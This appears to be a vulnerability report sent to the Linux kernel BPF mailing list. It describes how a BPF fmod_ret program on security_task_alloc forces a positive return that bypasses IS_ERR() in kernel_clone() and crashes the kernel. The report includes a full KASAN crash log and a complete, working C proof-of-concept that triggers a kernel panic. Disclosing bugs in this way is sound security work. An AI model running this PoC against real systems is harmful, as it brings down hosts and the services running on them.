Null-Pointer Dereference in kernel_clone() via BPF fmod_ret on security_task_alloc


Quan Sun

Apr 11, 2026, 1:42:46 AM
to dan...@iogearbox.net, b...@vger.kernel.org, ddd...@hust.edu.cn, M2024...@hust.edu.cn, dz...@hust.edu.cn, hust-os-ker...@googlegroups.com, ak...@linux-foundation.org, da...@kernel.org, lorenzo...@oracle.com
Our fuzzing found a Null-Pointer Dereference / General Protection Fault
vulnerability in the Linux kernel BPF and process management subsystems.
The issue is triggered when a `BPF_PROG_TYPE_TRACING` program with
`BPF_MODIFY_RETURN` is attached to `security_task_alloc`, forcing a
positive return value. This bypasses the `IS_ERR()` check in
`kernel_clone()`, causing the kernel to treat `0x1` as a valid
`task_struct` pointer and dereference it.

Reported-by: Quan Sun <202209...@std.uestc.edu.cn>
Reported-by: Yinhao Hu <ddd...@hust.edu.cn>
Reported-by: Kaiyan Mei <M2024...@hust.edu.cn>
Reviewed-by: Dongliang Mu <dz...@hust.edu.cn>

## Root Cause

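This vulnerability is caused by a semantic gap between the eBPF
`fmod_ret` capability, which can make the target function return an
arbitrary integer, and the process creation path (`copy_process()` and
`kernel_clone()`), which assumes that every failure is reported as a
negative errno value.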

1. A tracing program is loaded as `BPF_PROG_TYPE_TRACING` with
`expected_attach_type = BPF_MODIFY_RETURN` and attached via BTF to the
security hook `security_task_alloc`.
2. The BPF program overrides the return value of `security_task_alloc`
and forces a positive, non-zero value (e.g., `1`). A negative errno such
as `-ENOMEM` would be propagated as an ordinary failure and is not
expected to trigger the bug.
3. User space triggers a process creation syscall (like `fork` or
`clone`). The kernel invokes `copy_process` to allocate and initialize a
new `task_struct` for the child process.
4. `copy_process` invokes `security_task_alloc`. Due to the attached BPF
program, it returns the positive value `1`.
5. `copy_process` treats any non-zero return from `security_task_alloc`
as a failure. It aborts initialization, cleans up, and returns the error
code cast to a pointer via `ERR_PTR(1)` (which evaluates to the memory
address `0x1`).
6. In `kernel_clone()`, the kernel uses the `IS_ERR()` macro to check if
the returned `task_struct *p` is an error pointer. However, `IS_ERR()`
only checks for negative error codes in the range `[-MAX_ERRNO, -1]`.
Since `0x1` is not in this range, the check `IS_ERR(p)` evaluates to
`false`.
7. The kernel incorrectly assumes `p` is a valid `task_struct` pointer
and proceeds to call `get_task_pid(p, PIDTYPE_PID)`. This dereferences
the invalid address `0x1` (plus the offset of the `thread_pid` field),
triggering a general protection fault or null-pointer dereference.
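
The range check described in step 6 can be reproduced in user space. The following is a minimal sketch, not kernel code: the `model_` names are made up for illustration, and the comparison mirrors the way the kernel's `IS_ERR_VALUE()` compares a pointer against `(unsigned long)-MAX_ERRNO`.

```c
#include <stdbool.h>
#include <stdint.h>

/* Largest errno the kernel encodes in a pointer (MAX_ERRNO). */
#define MODEL_MAX_ERRNO 4095

/* Model of ERR_PTR(): store an integer return value in a pointer. */
static inline void *model_err_ptr(long error)
{
    return (void *)(intptr_t)error;
}

/*
 * Model of IS_ERR(): true only for the topmost MODEL_MAX_ERRNO
 * addresses, i.e. for encoded values in [-MAX_ERRNO, -1].
 */
static inline bool model_is_err(const void *ptr)
{
    return (uintptr_t)ptr >= (uintptr_t)-MODEL_MAX_ERRNO;
}
```

With these helpers, `model_is_err(model_err_ptr(-12))` is true, while `model_is_err(model_err_ptr(1))` is false, so a pointer holding `0x1` is classified as a valid object pointer.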

#### Execution Flow Visualization

```text
Vulnerability Execution Flow
|
|--- 1. `bpf(BPF_PROG_LOAD, ...)` loads tracing program
| |
| `-- Program type: `BPF_PROG_TYPE_TRACING`
| Attach type: `BPF_MODIFY_RETURN`
| Program is set to return an error (e.g., 1)
|
|--- 2. Program attachment via BTF
| |
| `-- Attach to target function: `security_task_alloc`
|
|--- 3. User triggers `fork()` / `clone()`
| |
| `-- `kernel_clone` -> `copy_process`
| |
| |-- Allocates bare `task_struct` (many pointers are still NULL)
| |-- Calls `security_task_alloc(task)`
|
|--- 4. fmod_ret trampoline invokes BPF program
| |
| `-- Program forces `security_task_alloc` to return 1 (positive error code)
|
|--- 5. `copy_process` aborts and returns `ERR_PTR(1)` (address 0x1)
| |
| `-- `kernel_clone` evaluates `IS_ERR(p)`
| |
| `-> `IS_ERR((void *)1)` evaluates to `false`!
| |
| `-> Kernel proceeds, assuming `p = 0x1` is a valid `task_struct` pointer
| |
| `-> `get_task_pid(p)` accesses `0x1 + offset` -> Crash!
```
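
The flow above can be modelled in user space to show which hook return values reach the dereference. This is a sketch under simplifying assumptions: `model_copy_process` and `model_kernel_clone` are hypothetical stand-ins that keep only the error-propagation logic, and the model reports the bogus pointer instead of dereferencing it.

```c
#include <stdbool.h>
#include <stdint.h>

#define MODEL_MAX_ERRNO 4095

struct model_task { int pid; };

enum model_outcome {
    MODEL_CHILD_CREATED,      /* hook returned 0 */
    MODEL_ERROR_PROPAGATED,   /* IS_ERR() caught the failure */
    MODEL_BOGUS_POINTER_USED  /* failure slipped past IS_ERR() */
};

static bool model_is_err(const void *p)
{
    return (uintptr_t)p >= (uintptr_t)-MODEL_MAX_ERRNO;
}

/* Any non-zero hook result aborts and is returned as ERR_PTR(retval). */
static struct model_task *model_copy_process(struct model_task *child,
                                             int hook_ret)
{
    if (hook_ret)
        return (struct model_task *)(intptr_t)hook_ret;
    return child;
}

static enum model_outcome model_kernel_clone(int hook_ret)
{
    static struct model_task child = { .pid = 42 };
    struct model_task *p = model_copy_process(&child, hook_ret);

    if (model_is_err(p))
        return MODEL_ERROR_PROPAGATED;
    if (p != &child)
        return MODEL_BOGUS_POINTER_USED; /* the kernel dereferences p here */
    return MODEL_CHILD_CREATED;
}
```

In this model a hook result of `0` creates the child, `-12` is propagated as an error, and `1` ends in the bogus-pointer case that corresponds to the crash in `get_task_pid()`.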

## Reproduction Steps

1. Load a tracing `fmod_ret` BPF program that:
- Takes the necessary arguments for `security_task_alloc`.
- Directly returns a non-zero value.
2. Attach the program to the valid BTF function id for
`security_task_alloc` obtained from the kernel image (using
`BPF_MODIFY_RETURN`).
3. Trigger the process creation path by calling `fork()` or `clone()`
from user space.
4. `copy_process` returns `ERR_PTR(1)`, the `IS_ERR()` check in
`kernel_clone()` does not catch it, and the kernel crashes in
`get_task_pid()` with a general protection fault on the resulting
near-null address.

## KASAN Report

```text
[ 203.374516][ T9921] Oops: general protection fault, probably for
non-canonical addresI
[ 203.376012][ T9921] KASAN: null-ptr-deref in range
[0x00000000000006a0-0x000000000000]
[ 203.377050][ T9921] CPU: 0 UID: 0 PID: 9921 Comm: poc Not tainted
7.0.0-rc5-g6f6c794d
[ 203.378250][ T9921] Hardware name: QEMU Standard PC (i440FX + PIIX,
1996), BIOS 1.15.4
[ 203.379375][ T9921] RIP: 0010:get_task_pid+0x92/0x390
[ 203.380036][ T9921] Code: 85 db 0f 85 f5 00 00 00 e8 7b ba 38 00 48
81 c5 a0 06 00 009
[ 203.382417][ T9921] RSP: 0018:ffa000000288fc88 EFLAGS: 00010206
[ 203.383164][ T9921] RAX: dffffc0000000000 RBX: 0000000000000000 RCX:
ffffffff8186b698
[ 203.384041][ T9921] RDX: 00000000000000d4 RSI: ffffffff8186b6b1 RDI:
0000000000000005
[ 203.384961][ T9921] RBP: 00000000000006a1 R08: 0000000000000000 R09:
0000000000000001
[ 203.385885][ T9921] R10: 0000000000000000 R11: 0000000000000007 R12:
0000000000000001
[ 203.386823][ T9921] R13: 0000000000000000 R14: 0000000000000001 R15:
00007f8e1d374690
[ 203.387796][ T9921] FS: 00007f8e1d3743c0(0000)
GS:ff110000cd71d000(0000) knlGS:000000
[ 203.388893][ T9921] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 203.389699][ T9921] CR2: 00007f8e1d4015b0 CR3: 000000002ffee000 CR4:
0000000000753ef0
[ 203.390679][ T9921] PKRU: 55555554
[ 203.391105][ T9921] Call Trace:
[ 203.391520][ T9921] <TASK>
[ 203.391882][ T9921] kernel_clone+0x1a1/0x900
[ 203.392438][ T9921] ? __pfx_kernel_clone+0x10/0x10
[ 203.393083][ T9921] ? vfs_write+0x66d/0x1180
[ 203.393672][ T9921] ? vfs_write+0x16e/0x1180
[ 203.394238][ T9921] ? __pfx_tty_write+0x10/0x10
[ 203.394847][ T9921] ? __pfx_vfs_write+0x10/0x10
[ 203.395445][ T9921] __do_sys_clone+0xce/0x120
[ 203.396018][ T9921] ? __pfx___do_sys_clone+0x10/0x10
[ 203.396691][ T9921] ? ksys_write+0x1a8/0x240
[ 203.397268][ T9921] ? __pfx_ksys_write+0x10/0x10
[ 203.397872][ T9921] do_syscall_64+0x11b/0xf80
[ 203.398474][ T9921] entry_SYSCALL_64_after_hwframe+0x77/0x7f
[ 203.399230][ T9921] RIP: 0033:0x7f8e1d483353
[ 203.399792][ T9921] Code: 00 00 00 00 00 66 90 64 48 8b 04 25 10 00
00 00 45 31 c0 310
[ 203.402139][ T9921] RSP: 002b:00007fff9b58b538 EFLAGS: 00000246
ORIG_RAX: 000000000008
[ 203.403154][ T9921] RAX: ffffffffffffffda RBX: 0000000000000000 RCX:
00007f8e1d483353
[ 203.404110][ T9921] RDX: 0000000000000000 RSI: 0000000000000000 RDI:
0000000001200011
[ 203.405084][ T9921] RBP: 0000000000000000 R08: 0000000000000000 R09:
0000000000000064
[ 203.406050][ T9921] R10: 00007f8e1d374690 R11: 0000000000000246 R12:
0000000000000001
[ 203.407029][ T9921] R13: 00007fff9b58c8c8 R14: 000055c2141e6dc8 R15:
00007f8e1d629020
[ 203.408036][ T9921] </TASK>
[ 203.408427][ T9921] Modules linked in:
[ 203.408985][ T9921] ---[ end trace 0000000000000000 ]---
[ 203.409802][ T9921] RIP: 0010:get_task_pid+0x92/0x390
[ 203.410306][ T9921] Code: 85 db 0f 85 f5 00 00 00 e8 7b ba 38 00 48
81 c5 a0 06 00 009
[ 203.412180][ T9921] RSP: 0018:ffa000000288fc88 EFLAGS: 00010206
[ 203.413861][ T5172] Oops: general protection fault, probably for
non-canonical addresI
[ 203.415113][ T5172] KASAN: null-ptr-deref in range
[0x00000000000006a0-0x000000000000]
[ 203.415880][ T5172] CPU: 0 UID: 0 PID: 5172 Comm: systemd-journal
Tainted: G D
[ 203.417080][ T5172] Tainted: [D]=DIE
[ 203.417407][ T5172] Hardware name: QEMU Standard PC (i440FX + PIIX,
1996), BIOS 1.15.4
[ 203.418245][ T5172] RIP: 0010:get_task_pid+0x92/0x390
[ 203.418800][ T5172] Code: 85 db 0f 85 f5 00 00 00 e8 7b ba 38 00 48
81 c5 a0 06 00 009
[ 203.420890][ T5172] RSP: 0018:ffa000000268fc88 EFLAGS: 00010206
[ 203.421442][ T5172] RAX: dffffc0000000000 RBX: 0000000000000000 RCX:
ffffffff8186b698
[ 203.422166][ T5172] RDX: 00000000000000d4 RSI: ffffffff8186b6b1 RDI:
0000000000000005
[ 203.423114][ T5172] RBP: 00000000000006a1 R08: 0000000000000000 R09:
0000000000000000
[ 203.423884][ T5172] R10: 0000000000000000 R11: ffa000000268f7a6 R12:
0000000000000000
[ 203.424744][ T5172] R13: 0000000000000000 R14: 0000000000000001 R15:
00007f3f260fc990
[ 203.425464][ T5172] FS: 00007f3f26e925c0(0000)
GS:ff110000cd71d000(0000) knlGS:000000
[ 203.426288][ T5172] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 203.426896][ T5172] CR2: 00007f3f25286988 CR3: 000000002a871000 CR4:
0000000000753ef0
[ 203.427631][ T5172] PKRU: 55555554
[ 203.427964][ T5172] Call Trace:
[ 203.428294][ T5172] <TASK>
[ 203.428565][ T5172] kernel_clone+0x1a1/0x900
[ 203.428989][ T5172] ? __pfx_kernel_clone+0x10/0x10
[ 203.429474][ T5172] ? css_rstat_updated+0x1c5/0x570
[ 203.429941][ T5172] ? __pfx___handle_mm_fault+0x10/0x10
[ 203.430467][ T5172] ? sigprocmask+0x23f/0x340
[ 203.430923][ T5172] ? __might_fault+0x13d/0x190
[ 203.431391][ T5172] __do_sys_clone+0xce/0x120
[ 203.431831][ T5172] ? __pfx___do_sys_clone+0x10/0x10
[ 203.432449][ T5172] ? rcu_is_watching+0x12/0xc0
[ 203.432927][ T5172] do_syscall_64+0x11b/0xf80
[ 203.433359][ T5172] entry_SYSCALL_64_after_hwframe+0x77/0x7f
[ 203.433927][ T5172] RIP: 0033:0x7f3f27327af2
[ 203.434333][ T5172] Code: 85 ff 74 3e 48 83 e6 f0 74 38 48 89 4e f8
48 83 ee 10 48 890
[ 203.436383][ T5172] RSP: 002b:00007fff5ab32c78 EFLAGS: 00000202
ORIG_RAX: 000000000008
[ 203.437367][ T5172] RAX: ffffffffffffffda RBX: 00007f3f272a7ef0 RCX:
00007f3f27327af2
[ 203.438093][ T5172] RDX: 00007f3f260fc990 RSI: 00007f3f260fbd70 RDI:
00000000003d0f00
[ 203.438847][ T5172] RBP: 00007f3f260fc6c0 R08: 00007f3f260fc6c0 R09:
00007f3f260fc6c0
[ 203.439871][ T5172] R10: 00007f3f260fc990 R11: 0000000000000202 R12:
fffffffffffffdc8
[ 203.440749][ T5172] R13: 0000000000000000 R14: 00007fff5ab32cd0 R15:
00007f3f258fc000
[ 203.441653][ T5172] </TASK>
[ 203.441939][ T5172] Modules linked in:
[ 203.442375][ T5172] ---[ end trace 0000000000000000 ]---
[ 203.443083][ T9921] RAX: dffffc0000000000 RBX: 0000000000000000 RCX:
ffffffff8186b698
[ 203.444074][ T9921] RDX: 00000000000000d4 RSI: ffffffff8186b6b1 RDI:
0000000000000005
[ 203.445070][ T9921] RBP: 00000000000006a1 R08: 0000000000000000 R09:
0000000000000001
[ 203.445916][ T9921] R10: 0000000000000000 R11: 0000000000000007 R12:
0000000000000001
[ 203.446834][ T9921] R13: 0000000000000000 R14: 0000000000000001 R15:
00007f8e1d374690
[ 203.447609][ T9921] FS: 00007f8e1d3743c0(0000)
GS:ff110000cd71d000(0000) knlGS:000000
[ 203.448531][ T9921] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 203.449344][ T9921] CR2: 00007f3f25286988 CR3: 000000002ffee000 CR4:
0000000000753ef0
[ 203.450323][ T9921] PKRU: 55555554
[ 203.450782][ T9921] Kernel panic - not syncing: Fatal exception
[ 203.451592][ T9921] Kernel Offset: disabled
[ 203.452135][ T9921] Rebooting in 86400 seconds..
```
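
The register dump appears consistent with the root cause analysis: `RBP` holds `0x6a1`, which is the bogus pointer `0x1` plus `0x6a0`, and `RDX` holds `0xd4`, which is `0x6a1 >> 3`, the index KASAN uses for its shadow lookup relative to the base in `RAX`. The sketch below reproduces that arithmetic. It assumes that `0x6a0` is the offset of `thread_pid` in this particular build (inferred from the `a0 06 00 00` immediate in the `Code:` line) and that the x86-64 KASAN shadow offset is the value shown in `RAX`; the function names are made up for illustration.

```c
#include <stdint.h>

/* Values read from the report above; both are build-specific assumptions. */
#define MODEL_THREAD_PID_OFFSET  0x6a0ULL
#define MODEL_KASAN_SHADOW_BASE  0xdffffc0000000000ULL
#define MODEL_KASAN_SCALE_SHIFT  3

/* Address of the field that get_task_pid() tries to read. */
static inline uint64_t model_field_addr(uint64_t task_ptr)
{
    return task_ptr + MODEL_THREAD_PID_OFFSET;
}

/* Shadow byte KASAN checks before the access is allowed. */
static inline uint64_t model_kasan_shadow_addr(uint64_t addr)
{
    return (addr >> MODEL_KASAN_SCALE_SHIFT) + MODEL_KASAN_SHADOW_BASE;
}
```

For `task_ptr = 0x1` the field address is `0x6a1` and the shadow address is `0xdffffc00000000d4`, which matches the log's description of a fault on a non-canonical address while KASAN attributes it to a null-pointer dereference near `0x6a0`.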

## Proof of Concept

The following C program demonstrates the vulnerability on the latest
bpf-next (commit 6f6c794d0ff05dab1fa4677f39043de8a6a80da3).

### How BTF_ID is obtained

The PoC uses `BPF_MODIFY_RETURN`, so `attach_btf_id` must be the
function BTF id from the exact running kernel image (the `vmlinux` used
by the VM). The PoC resolves the id at runtime from
`/sys/kernel/btf/vmlinux` using libbpf. To look up the BTF ID for
`security_task_alloc` by hand:

```bash
bpftool btf dump file /path/to/vmlinux | grep "FUNC 'security_task_alloc'"
```

Example output:
```text
[XXXXX] FUNC 'security_task_alloc' type_id=YYYYY linkage=static
```
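
If the ID is taken from the `bpftool` output rather than resolved with libbpf, the bracketed number has to be extracted from the matching line. The helper below is a minimal sketch of that step; `parse_btf_func_id` is a hypothetical name, and it assumes the line format shown in the example output above.

```c
#include <stdio.h>
#include <string.h>

/*
 * Return the bracketed BTF id if `line` describes FUNC '<func>',
 * or -1 if the line has a different kind, name, or format.
 */
static int parse_btf_func_id(const char *line, const char *func)
{
    int id;
    char name[128];

    /* Expected shape: [<id>] FUNC '<name>' type_id=... linkage=... */
    if (sscanf(line, " [%d] FUNC '%127[^']'", &id, name) != 2)
        return -1;

    return strcmp(name, func) == 0 ? id : -1;
}
```

Each line of the `bpftool btf dump` output can be passed to this helper; the first non-negative result is the value to place in `attach_btf_id`.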

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/syscall.h>
#include <linux/bpf.h>
#include <string.h>
#include <bpf/btf.h>

int main(void) {
    /* Resolve the BTF id of security_task_alloc from the running kernel. */
    int expected_id = -1;
    struct btf *b = btf__parse("/sys/kernel/btf/vmlinux", NULL);
    if (!b) return 1;
    for (int i = 1; i <= btf__type_cnt(b) - 1; i++) {
        const struct btf_type *t = btf__type_by_id(b, i);
        if (btf_is_func(t)) {
            const char *name = btf__name_by_offset(b, t->name_off);
            if (strcmp(name, "security_task_alloc") == 0) {
                expected_id = i;
                break;
            }
        }
    }
    if (expected_id < 0) {
        printf("Failed to find BTF ID for security_task_alloc\n");
        return 1;
    }
    printf("BTF ID: %d\n", expected_id);

    /* Two-instruction program: always return 1 from the hooked function. */
    struct bpf_insn insns[] = {
        { 0xb7, BPF_REG_0, 0, 0, 1 }, // r0 = 1 (BPF_ALU64 | BPF_MOV | BPF_K)
        { 0x95, 0, 0, 0, 0 }          // exit   (BPF_JMP | BPF_EXIT)
    };

    /* Load it as a tracing program with the fmod_ret attach type. */
    char log_buf[4096] = {0};
    union bpf_attr attr;
    memset(&attr, 0, sizeof(attr));
    attr.prog_type = BPF_PROG_TYPE_TRACING;
    attr.insn_cnt = 2;
    attr.insns = (uint64_t)insns;
    attr.license = (uint64_t)"GPL";
    attr.log_level = 1;
    attr.log_size = sizeof(log_buf);
    attr.log_buf = (uint64_t)log_buf;
    attr.expected_attach_type = BPF_MODIFY_RETURN; // enum value 26
    attr.attach_btf_id = expected_id;

    int prog_fd = syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr));
    if (prog_fd < 0) {
        printf("bpf_prog_load failed: %s\n", log_buf);
        return 1;
    }
    printf("Loaded prog %d\n", prog_fd);

    /* Attach the program to security_task_alloc through a BPF link. */
    union bpf_attr link_attr;
    memset(&link_attr, 0, sizeof(link_attr));
    link_attr.link_create.prog_fd = prog_fd;
    link_attr.link_create.target_fd = 0;
    link_attr.link_create.attach_type = BPF_MODIFY_RETURN;
    int link_fd = syscall(__NR_bpf, BPF_LINK_CREATE, &link_attr,
                          sizeof(link_attr));
    if (link_fd < 0) {
        perror("bpf_link_create failed");
        return 1;
    }
    printf("Linked %d\n", link_fd);

    /* Any process creation now runs the hook and triggers the crash. */
    printf("Forking to trigger panic...\n");
    fork();
    return 0;
}
```
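
The PoC writes its two instructions as raw opcode bytes. As a reading aid, the sketch below shows how `0xb7` and `0x95` decompose into the class, operation, and source fields of the eBPF encoding. The constants carry the same values as in the kernel's UAPI headers but are re-declared under hypothetical `MODEL_` names so the block compiles without those headers.

```c
#include <stdint.h>

/* Instruction class, operation, and source bits (UAPI values). */
#define MODEL_BPF_ALU64 0x07
#define MODEL_BPF_JMP   0x05
#define MODEL_BPF_K     0x00
#define MODEL_BPF_MOV   0xb0
#define MODEL_BPF_EXIT  0x90

/* Same field layout as struct bpf_insn: 8 bytes per instruction. */
struct model_insn {
    uint8_t code;
    uint8_t dst_reg:4;
    uint8_t src_reg:4;
    int16_t off;
    int32_t imm;
};

/* dst = imm, 64-bit move of an immediate. */
static inline struct model_insn model_mov64_imm(uint8_t dst, int32_t imm)
{
    struct model_insn insn = {
        .code = MODEL_BPF_ALU64 | MODEL_BPF_MOV | MODEL_BPF_K,
        .dst_reg = dst,
        .imm = imm,
    };
    return insn;
}

/* Return from the program with the value held in r0. */
static inline struct model_insn model_exit(void)
{
    struct model_insn insn = { .code = MODEL_BPF_JMP | MODEL_BPF_EXIT };
    return insn;
}
```

`model_mov64_imm(0, 1)` followed by `model_exit()` yields the same `code` bytes and immediate as the `insns[]` array in the PoC.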

## Kernel Configuration Requirements for Reproduction

The vulnerability can be triggered with the kernel config in the
attachment (`config-next`).